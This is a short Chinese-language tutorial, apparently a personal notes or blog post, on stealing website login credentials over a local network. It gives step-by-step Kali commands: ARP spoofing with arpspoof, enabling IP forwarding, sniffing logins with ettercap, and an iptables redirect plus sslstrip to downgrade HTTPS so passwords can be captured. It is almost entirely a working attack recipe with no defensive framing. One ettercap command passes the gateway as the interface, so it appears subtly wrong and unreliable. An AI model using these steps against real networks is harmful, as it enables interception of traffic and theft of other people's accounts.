HTTP/HTTPS账号密码获取

kali系统命令：
arpspoof -i 网卡 -t 目标IP 网关 #断网攻击

HTTP账号密码获取：

命令：echo 1 > /proc/sys/net/ipv4/ip_forward # 写入 1 表示开启转发功能!

可以用cat查看修改：

命令：cat /proc/sys/net/ipv4/ip_forward # 显示1表示成功开启转发功能，0表示未开启

命令：arpspoof -i 网卡 -t 目标IP 网关 #开启欺骗

用ettercap抓取登入帐号，密码：

命令：ettercap -Tq -i 网关 # T表示文本模式，q表示安静模式


HTTPS账号密码获取：
先编辑下/etc/ettercap/etter.conf
命令：vim /etc/ettercap/etter.conf
找到
# if you use iptables:
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

改为（去掉两个#）：
# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
进入vim状态：
按下i，进入编辑
按下Esc，Shift+：,q!(不保存，退出)或 wq（保存，退出）

然后运行sslstrip -a -f -k 实现https转换成http以获取帐号密码
再用HTTP账号密码获取方法就可。